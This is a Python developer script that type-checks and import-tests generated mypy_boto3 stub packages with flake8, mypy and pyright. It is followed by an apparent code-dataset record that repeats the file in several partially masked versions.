data = json.loads(output).get("generalDiagnostics", [])
errors = []
for error in data:
message = error.get("message", "")
if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):
continue
errors.append(error)
if errors:
messages = []
for error in errors:
messages.append(
f'{error["file"]}:{error["range"]["start"]["line"]} {error.get("message", "")}'
)
raise SnapshotMismatchError("\n".join(messages))
def run_mypy(path: Path) -> None:
"""
Check output with mypy.
"""
try:
output = subprocess.check_output(
[sys.executable, "-m", "mypy", path.as_posix()],
stderr=subprocess.STDOUT,
encoding="utf8",
)
except subprocess.CalledProcessError as e:
output = e.output
errors = []
for message in output.splitlines():
if not message or message.startswith("Found"):
continue
if any(imsg in message for imsg in IGNORE_MYPY_ERRORS):
continue
errors.append(message)
if errors:
raise SnapshotMismatchError("\n".join(errors)) from None
def run_call(path: Path) -> None:
"""
Check output by running it.
"""
if not (path / "__main__.py").exists():
return
try:
subprocess.check_call([sys.executable, path.as_posix()], stdout=subprocess.DEVNULL)
except subprocess.CalledProcessError as e:
raise SnapshotMismatchError(f"Path {path} cannot be imported: {e}") from None
def run_import(path: Path) -> None:
"""
Check output by installing and importing it.
"""
if not (path / "__main__.py").exists():
return
try:
subprocess.check_call(
[sys.executable, "-m", "pip", "install", "--no-input", path.parent.as_posix()],
stdout=subprocess.DEVNULL,
)
if (path / "__main__.py").exists():
subprocess.check_call(
[sys.executable, "-c", f"import {path.name}"],
stdout=subprocess.DEVNULL,
)
subprocess.check_call(
[sys.executable, "-m", "pip", "uninstall", "--no-input", "-y", path.name],
stdout=subprocess.DEVNULL,
)
except subprocess.CalledProcessError as e:
raise SnapshotMismatchError(f"Path {path} cannot be imported: {e}") from None
def is_package_dir(path: Path) -> bool:
"""
Check whether `path` contains a service package.
"""
if not path.is_dir():
return False
if path.name.endswith(".egg-info"):
return False
if (path / "__init__.pyi").exists():
return True
return False
def check_snapshot(path: Path) -> None:
"""
Check package type checkers snapshot.
Raises:
SnapshotMismatchError -- If snapshot is not equal to current output.
"""
logger = logging.getLogger(LOGGER_NAME)
logger.debug(f"Running flake8 for {path.name} ...")
run_flake8(path)
logger.debug(f"Running mypy for {path.name} ...")
run_mypy(path)
logger.debug(f"Running pyright for {path.name} ...")
run_pyright(path)
if (path / "__main__.py").exists():
logger.debug(f"Running call for {path.name} ...")
run_call(path)
logger.debug(f"Running import for {path.name} ...")
run_import(path)
def find_package_path(path: Path) -> Optional[Path]:
"""
Find package directory inside `path`.
"""
for package_path in path.iterdir():
if is_package_dir(package_path):
return package_path
def main() -> None:
"""
Run main logic.
"""
args = parse_args()
logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)
has_errors = False
for folder in sorted(args.path.iterdir()):
if not folder.name.endswith("_package"):
continue
if args.filter and not any(s in folder.as_posix() for s in args.filter):
continue
package_path = find_package_path(folder)
if not package_path:
continue
logger.info(f"Checking {folder.name}/{package_path.name} ...")
try:
check_snapshot(package_path)
except SnapshotMismatchError as e:
logger.error(e)
has_errors = True
if args.exit_on_error:
break
if has_errors:
sys.exit(1)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "f3466fd38ecf472a4342aad4d10410d6f2a67d47",
"index": 1779,
"step-1": "<mask token>\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) ->logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter('%(levelname)s %(message)s', datefmt=\n '%H:%M:%S')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() ->CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-x', '--exit-on-error', action='store_true')\n parser.add_argument('-p', '--path', type=Path, default=ROOT_PATH /\n 'mypy_boto3_output')\n parser.add_argument('filter', nargs='*')\n args = parser.parse_args()\n return CLINamespace(debug=args.debug, path=args.path, filter=args.\n filter, exit_on_error=args.exit_on_error)\n\n\n<mask token>\n\n\ndef run_pyright(path: Path) ->None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call(['npx', 'pyright', path.as_posix(),\n '--outputjson'], stderr=subprocess.DEVNULL, stdout=f)\n return\n except subprocess.CalledProcessError:\n pass\n temp_path = Path(f.name)\n output = temp_path.read_text()\n data = json.loads(output).get('generalDiagnostics', [])\n errors = []\n for error in data:\n message = error.get('message', '')\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n if errors:\n messages = []\n for error in errors:\n messages.append(\n f\"{error['file']}:{error['range']['start']['line']} {error.get('message', '')}\"\n )\n raise SnapshotMismatchError('\\n'.join(messages))\n\n\n<mask token>\n\n\ndef run_call(path: Path) ->None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, path.as_posix()], stdout=\n subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef run_import(path: Path) ->None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install',\n '--no-input', path.parent.as_posix()], stdout=subprocess.DEVNULL)\n if (path / '__main__.py').exists():\n subprocess.check_call([sys.executable, '-c',\n f'import {path.name}'], stdout=subprocess.DEVNULL)\n subprocess.check_call([sys.executable, '-m', 'pip', 'uninstall',\n '--no-input', '-y', path.name], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef is_package_dir(path: Path) ->bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if path.name.endswith('.egg-info'):\n return False\n if (path / '__init__.pyi').exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) ->None:\n \"\"\"\n Check package type checkers snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f'Running flake8 for {path.name} ...')\n run_flake8(path)\n logger.debug(f'Running mypy for {path.name} ...')\n run_mypy(path)\n logger.debug(f'Running pyright for {path.name} ...')\n run_pyright(path)\n if (path / '__main__.py').exists():\n logger.debug(f'Running call for {path.name} ...')\n run_call(path)\n logger.debug(f'Running import for {path.name} ...')\n run_import(path)\n\n\ndef find_package_path(path: Path) ->Optional[Path]:\n \"\"\"\n Find package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() ->None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith('_package'):\n continue\n if args.filter and not any(s in folder.as_posix() for s in args.filter\n ):\n continue\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f'Checking {folder.name}/{package_path.name} ...')\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n if has_errors:\n sys.exit(1)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) ->logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter('%(levelname)s %(message)s', datefmt=\n '%H:%M:%S')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() ->CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-x', '--exit-on-error', action='store_true')\n parser.add_argument('-p', '--path', type=Path, default=ROOT_PATH /\n 'mypy_boto3_output')\n parser.add_argument('filter', nargs='*')\n args = parser.parse_args()\n return CLINamespace(debug=args.debug, path=args.path, filter=args.\n filter, exit_on_error=args.exit_on_error)\n\n\ndef run_flake8(path: Path) ->None:\n \"\"\"\n Check output with flake8.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call([sys.executable, '-m', 'flake8',\n '--ignore',\n 'E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803'\n , path.as_posix()], stderr=f, stdout=f)\n except subprocess.CalledProcessError:\n temp_path = Path(f.name)\n output = temp_path.read_text()\n raise SnapshotMismatchError(output)\n\n\ndef run_pyright(path: Path) ->None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call(['npx', 'pyright', path.as_posix(),\n '--outputjson'], stderr=subprocess.DEVNULL, stdout=f)\n return\n except subprocess.CalledProcessError:\n pass\n temp_path = Path(f.name)\n output = temp_path.read_text()\n data = json.loads(output).get('generalDiagnostics', [])\n errors = []\n for error in data:\n message = error.get('message', '')\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n if errors:\n messages = []\n for error in errors:\n messages.append(\n f\"{error['file']}:{error['range']['start']['line']} {error.get('message', '')}\"\n )\n raise SnapshotMismatchError('\\n'.join(messages))\n\n\n<mask token>\n\n\ndef run_call(path: Path) ->None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, path.as_posix()], stdout=\n subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef run_import(path: Path) ->None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install',\n '--no-input', path.parent.as_posix()], stdout=subprocess.DEVNULL)\n if (path / '__main__.py').exists():\n subprocess.check_call([sys.executable, '-c',\n f'import {path.name}'], stdout=subprocess.DEVNULL)\n subprocess.check_call([sys.executable, '-m', 'pip', 'uninstall',\n '--no-input', '-y', path.name], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef is_package_dir(path: Path) ->bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if path.name.endswith('.egg-info'):\n return False\n if (path / '__init__.pyi').exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) ->None:\n \"\"\"\n Check package type checkers snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f'Running flake8 for {path.name} ...')\n run_flake8(path)\n logger.debug(f'Running mypy for {path.name} ...')\n run_mypy(path)\n logger.debug(f'Running pyright for {path.name} ...')\n run_pyright(path)\n if (path / '__main__.py').exists():\n logger.debug(f'Running call for {path.name} ...')\n run_call(path)\n logger.debug(f'Running import for {path.name} ...')\n run_import(path)\n\n\ndef find_package_path(path: Path) ->Optional[Path]:\n \"\"\"\n Find package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() ->None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith('_package'):\n continue\n if args.filter and not any(s in folder.as_posix() for s in args.filter\n ):\n continue\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f'Checking {folder.name}/{package_path.name} ...')\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n if has_errors:\n sys.exit(1)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) ->logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter('%(levelname)s %(message)s', datefmt=\n '%H:%M:%S')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() ->CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-x', '--exit-on-error', action='store_true')\n parser.add_argument('-p', '--path', type=Path, default=ROOT_PATH /\n 'mypy_boto3_output')\n parser.add_argument('filter', nargs='*')\n args = parser.parse_args()\n return CLINamespace(debug=args.debug, path=args.path, filter=args.\n filter, exit_on_error=args.exit_on_error)\n\n\ndef run_flake8(path: Path) ->None:\n \"\"\"\n Check output with flake8.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call([sys.executable, '-m', 'flake8',\n '--ignore',\n 'E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803'\n , path.as_posix()], stderr=f, stdout=f)\n except subprocess.CalledProcessError:\n temp_path = Path(f.name)\n output = temp_path.read_text()\n raise SnapshotMismatchError(output)\n\n\ndef run_pyright(path: Path) ->None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call(['npx', 'pyright', path.as_posix(),\n '--outputjson'], stderr=subprocess.DEVNULL, stdout=f)\n return\n except subprocess.CalledProcessError:\n pass\n temp_path = Path(f.name)\n output = temp_path.read_text()\n data = json.loads(output).get('generalDiagnostics', [])\n errors = []\n for error in data:\n message = error.get('message', '')\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n if errors:\n messages = []\n for error in errors:\n messages.append(\n f\"{error['file']}:{error['range']['start']['line']} {error.get('message', '')}\"\n )\n raise SnapshotMismatchError('\\n'.join(messages))\n\n\ndef run_mypy(path: Path) ->None:\n \"\"\"\n Check output with mypy.\n \"\"\"\n try:\n output = subprocess.check_output([sys.executable, '-m', 'mypy',\n path.as_posix()], stderr=subprocess.STDOUT, encoding='utf8')\n except subprocess.CalledProcessError as e:\n output = e.output\n errors = []\n for message in output.splitlines():\n if not message or message.startswith('Found'):\n continue\n if any(imsg in message for imsg in IGNORE_MYPY_ERRORS):\n continue\n errors.append(message)\n if errors:\n raise SnapshotMismatchError('\\n'.join(errors)) from None\n\n\ndef run_call(path: Path) ->None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, path.as_posix()], stdout=\n subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef run_import(path: Path) ->None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install',\n '--no-input', path.parent.as_posix()], stdout=subprocess.DEVNULL)\n if (path / '__main__.py').exists():\n subprocess.check_call([sys.executable, '-c',\n f'import {path.name}'], stdout=subprocess.DEVNULL)\n subprocess.check_call([sys.executable, '-m', 'pip', 'uninstall',\n '--no-input', '-y', path.name], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef is_package_dir(path: Path) ->bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if path.name.endswith('.egg-info'):\n return False\n if (path / '__init__.pyi').exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) ->None:\n \"\"\"\n Check package type checkers snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f'Running flake8 for {path.name} ...')\n run_flake8(path)\n logger.debug(f'Running mypy for {path.name} ...')\n run_mypy(path)\n logger.debug(f'Running pyright for {path.name} ...')\n run_pyright(path)\n if (path / '__main__.py').exists():\n logger.debug(f'Running call for {path.name} ...')\n run_call(path)\n logger.debug(f'Running import for {path.name} ...')\n run_import(path)\n\n\ndef find_package_path(path: Path) ->Optional[Path]:\n \"\"\"\n Find package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() ->None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith('_package'):\n continue\n if args.filter and not any(s in folder.as_posix() for s in args.filter\n ):\n continue\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f'Checking {folder.name}/{package_path.name} ...')\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n if has_errors:\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nROOT_PATH = Path(__file__).parent.parent.resolve()\nLOGGER_NAME = 'check_output'\nIGNORE_PYRIGHT_ERRORS = (\n '\"get_paginator\" is marked as overload, but no implementation is provided',\n '\"get_waiter\" is marked as overload, but no implementation is provided',\n 'Method \"paginate\" overrides class \"Paginator\" in an incompatible manner',\n 'Method \"wait\" overrides class \"Waiter\" in an incompatible manner',\n 'define variable \"items\" in incompatible way',\n 'define variable \"values\" in incompatible way', 'must return value',\n 'Import \"types_aiobotocore_', 'Import \"mypy_boto3_')\nIGNORE_MYPY_ERRORS = (\n 'Signature of \"create_client\" incompatible with supertype \"Session\"',\n 'Signature of \"paginate\" incompatible with supertype \"Paginator\"',\n 'Signature of \"wait\" incompatible with supertype \"Waiter\"', 'note:')\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) ->logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter('%(levelname)s %(message)s', datefmt=\n '%H:%M:%S')\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() ->CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-x', '--exit-on-error', action='store_true')\n parser.add_argument('-p', '--path', type=Path, default=ROOT_PATH /\n 'mypy_boto3_output')\n parser.add_argument('filter', nargs='*')\n args = parser.parse_args()\n return CLINamespace(debug=args.debug, path=args.path, filter=args.\n filter, exit_on_error=args.exit_on_error)\n\n\ndef run_flake8(path: Path) ->None:\n \"\"\"\n Check output with flake8.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call([sys.executable, '-m', 'flake8',\n '--ignore',\n 'E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803'\n , path.as_posix()], stderr=f, stdout=f)\n except subprocess.CalledProcessError:\n temp_path = Path(f.name)\n output = temp_path.read_text()\n raise SnapshotMismatchError(output)\n\n\ndef run_pyright(path: Path) ->None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile('w+b') as f:\n try:\n subprocess.check_call(['npx', 'pyright', path.as_posix(),\n '--outputjson'], stderr=subprocess.DEVNULL, stdout=f)\n return\n except subprocess.CalledProcessError:\n pass\n temp_path = Path(f.name)\n output = temp_path.read_text()\n data = json.loads(output).get('generalDiagnostics', [])\n errors = []\n for error in data:\n message = error.get('message', '')\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n if errors:\n messages = []\n for error in errors:\n messages.append(\n f\"{error['file']}:{error['range']['start']['line']} {error.get('message', '')}\"\n )\n raise SnapshotMismatchError('\\n'.join(messages))\n\n\ndef run_mypy(path: Path) ->None:\n \"\"\"\n Check output with mypy.\n \"\"\"\n try:\n output = subprocess.check_output([sys.executable, '-m', 'mypy',\n path.as_posix()], stderr=subprocess.STDOUT, encoding='utf8')\n except subprocess.CalledProcessError as e:\n output = e.output\n errors = []\n for message in output.splitlines():\n if not message or message.startswith('Found'):\n continue\n if any(imsg in message for imsg in IGNORE_MYPY_ERRORS):\n continue\n errors.append(message)\n if errors:\n raise SnapshotMismatchError('\\n'.join(errors)) from None\n\n\ndef run_call(path: Path) ->None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, path.as_posix()], stdout=\n subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef run_import(path: Path) ->None:\n \"\"\"\n Check output by installing and importing it.\n \"\"\"\n if not (path / '__main__.py').exists():\n return\n try:\n subprocess.check_call([sys.executable, '-m', 'pip', 'install',\n '--no-input', path.parent.as_posix()], stdout=subprocess.DEVNULL)\n if (path / '__main__.py').exists():\n subprocess.check_call([sys.executable, '-c',\n f'import {path.name}'], stdout=subprocess.DEVNULL)\n subprocess.check_call([sys.executable, '-m', 'pip', 'uninstall',\n '--no-input', '-y', path.name], stdout=subprocess.DEVNULL)\n except subprocess.CalledProcessError as e:\n raise SnapshotMismatchError(f'Path {path} cannot be imported: {e}'\n ) from None\n\n\ndef is_package_dir(path: Path) ->bool:\n \"\"\"\n Check whether `path` contains a service package.\n \"\"\"\n if not path.is_dir():\n return False\n if path.name.endswith('.egg-info'):\n return False\n if (path / '__init__.pyi').exists():\n return True\n return False\n\n\ndef check_snapshot(path: Path) ->None:\n \"\"\"\n Check package type checkers snapshot.\n\n Raises:\n SnapshotMismatchError -- If snapshot is not equal to current output.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n logger.debug(f'Running flake8 for {path.name} ...')\n run_flake8(path)\n logger.debug(f'Running mypy for {path.name} ...')\n run_mypy(path)\n logger.debug(f'Running pyright for {path.name} ...')\n run_pyright(path)\n if (path / '__main__.py').exists():\n logger.debug(f'Running call for {path.name} ...')\n run_call(path)\n logger.debug(f'Running import for {path.name} ...')\n run_import(path)\n\n\ndef find_package_path(path: Path) ->Optional[Path]:\n \"\"\"\n Find package directory inside `path`.\n \"\"\"\n for package_path in path.iterdir():\n if is_package_dir(package_path):\n return package_path\n\n\ndef main() ->None:\n \"\"\"\n Run main logic.\n \"\"\"\n args = parse_args()\n logger = setup_logging(logging.DEBUG if args.debug else logging.INFO)\n has_errors = False\n for folder in sorted(args.path.iterdir()):\n if not folder.name.endswith('_package'):\n continue\n if args.filter and not any(s in folder.as_posix() for s in args.filter\n ):\n continue\n package_path = find_package_path(folder)\n if not package_path:\n continue\n logger.info(f'Checking {folder.name}/{package_path.name} ...')\n try:\n check_snapshot(package_path)\n except SnapshotMismatchError as e:\n logger.error(e)\n has_errors = True\n if args.exit_on_error:\n break\n if has_errors:\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n\"\"\"\nChecker of generated packages.\n\n- [x] import generated package\n- [x] flake8\n- [x] pyright\n- [x] mypy\n\"\"\"\nimport argparse\nimport json\nimport logging\nimport subprocess\nimport sys\nimport tempfile\nfrom dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import List, Optional\n\nROOT_PATH = Path(__file__).parent.parent.resolve()\nLOGGER_NAME = \"check_output\"\nIGNORE_PYRIGHT_ERRORS = (\n '\"get_paginator\" is marked as overload, but no implementation is provided',\n '\"get_waiter\" is marked as overload, but no implementation is provided',\n # 'Expected type arguments for generic class \"ResourceCollection\"',\n # 'Type \"None\" cannot be assigned to type',\n # '\"__next__\" is not present',\n # 'Import \"boto3.s3.transfer\" could not be resolved',\n # \"is partially unknown\",\n 'Method \"paginate\" overrides class \"Paginator\" in an incompatible manner',\n 'Method \"wait\" overrides class \"Waiter\" in an incompatible manner',\n 'define variable \"items\" in incompatible way',\n 'define variable \"values\" in incompatible way',\n \"must return value\",\n 'Import \"types_aiobotocore_',\n 'Import \"mypy_boto3_',\n)\nIGNORE_MYPY_ERRORS = (\n 'Signature of \"create_client\" incompatible with supertype \"Session\"',\n 'Signature of \"paginate\" incompatible with supertype \"Paginator\"',\n 'Signature of \"wait\" incompatible with supertype \"Waiter\"',\n \"note:\",\n)\n\n\nclass SnapshotMismatchError(Exception):\n \"\"\"\n Main snapshot mismatch exception.\n \"\"\"\n\n\ndef setup_logging(level: int) -> logging.Logger:\n \"\"\"\n Get Logger instance.\n\n Arguments:\n level -- Log level\n\n Returns:\n Overriden Logger.\n \"\"\"\n logger = logging.getLogger(LOGGER_NAME)\n stream_handler = logging.StreamHandler()\n formatter = logging.Formatter(\"%(levelname)s %(message)s\", datefmt=\"%H:%M:%S\")\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.addHandler(stream_handler)\n logger.setLevel(level)\n return logger\n\n\n@dataclass\nclass CLINamespace:\n \"\"\"\n CLI namespace.\n \"\"\"\n\n debug: bool\n path: Path\n filter: List[str]\n exit_on_error: bool\n\n\ndef parse_args() -> CLINamespace:\n \"\"\"\n Parse CLI arguments.\n \"\"\"\n parser = argparse.ArgumentParser(__file__)\n parser.add_argument(\"-d\", \"--debug\", action=\"store_true\")\n parser.add_argument(\"-x\", \"--exit-on-error\", action=\"store_true\")\n parser.add_argument(\"-p\", \"--path\", type=Path, default=ROOT_PATH / \"mypy_boto3_output\")\n parser.add_argument(\"filter\", nargs=\"*\")\n args = parser.parse_args()\n return CLINamespace(\n debug=args.debug,\n path=args.path,\n filter=args.filter,\n exit_on_error=args.exit_on_error,\n )\n\n\ndef run_flake8(path: Path) -> None:\n \"\"\"\n Check output with flake8.\n \"\"\"\n with tempfile.NamedTemporaryFile(\"w+b\") as f:\n try:\n subprocess.check_call(\n [\n sys.executable,\n \"-m\",\n \"flake8\",\n \"--ignore\",\n \"E203,W503,E501,D200,D107,D401,D105,D205,D400,D101,D102,D403,N802,N803\",\n path.as_posix(),\n ],\n stderr=f,\n stdout=f,\n )\n except subprocess.CalledProcessError:\n temp_path = Path(f.name)\n output = temp_path.read_text()\n raise SnapshotMismatchError(output)\n\n\ndef run_pyright(path: Path) -> None:\n \"\"\"\n Check output with pyright.\n \"\"\"\n with tempfile.NamedTemporaryFile(\"w+b\") as f:\n try:\n subprocess.check_call(\n [\"npx\", \"pyright\", path.as_posix(), \"--outputjson\"],\n stderr=subprocess.DEVNULL,\n stdout=f,\n )\n return\n except subprocess.CalledProcessError:\n pass\n\n temp_path = Path(f.name)\n output = temp_path.read_text()\n\n data = json.loads(output).get(\"generalDiagnostics\", [])\n errors = []\n for error in data:\n message = error.get(\"message\", \"\")\n if any(imsg in message for imsg in IGNORE_PYRIGHT_ERRORS):\n continue\n errors.append(error)\n\n if errors:\n messages = []\n for error in errors:\n messages.append(\n f'{error[\"file\"]}:{error[\"range\"][\"start\"][\"line\"]} {error.get(\"message\", \"\")}'\n )\n raise SnapshotMismatchError(\"\\n\".join(messages))\n\n\ndef run_mypy(path: Path) -> None:\n \"\"\"\n Check output with mypy.\n \"\"\"\n try:\n output = subprocess.check_output(\n [sys.executable, \"-m\", \"mypy\", path.as_posix()],\n stderr=subprocess.STDOUT,\n encoding=\"utf8\",\n )\n except subprocess.CalledProcessError as e:\n output = e.output\n errors = []\n for message in output.splitlines():\n if not message or message.startswith(\"Found\"):\n continue\n if any(imsg in message for imsg in IGNORE_MYPY_ERRORS):\n continue\n errors.append(message)\n\n if errors:\n raise SnapshotMismatchError(\"\\n\".join(errors)) from None\n\n\ndef run_call(path: Path) -> None:\n \"\"\"\n Check output by running it.\n \"\"\"\n if not (path / \"__main__.py\").exists():\n return\n try:\n subprocess.check_call([sys.executable, 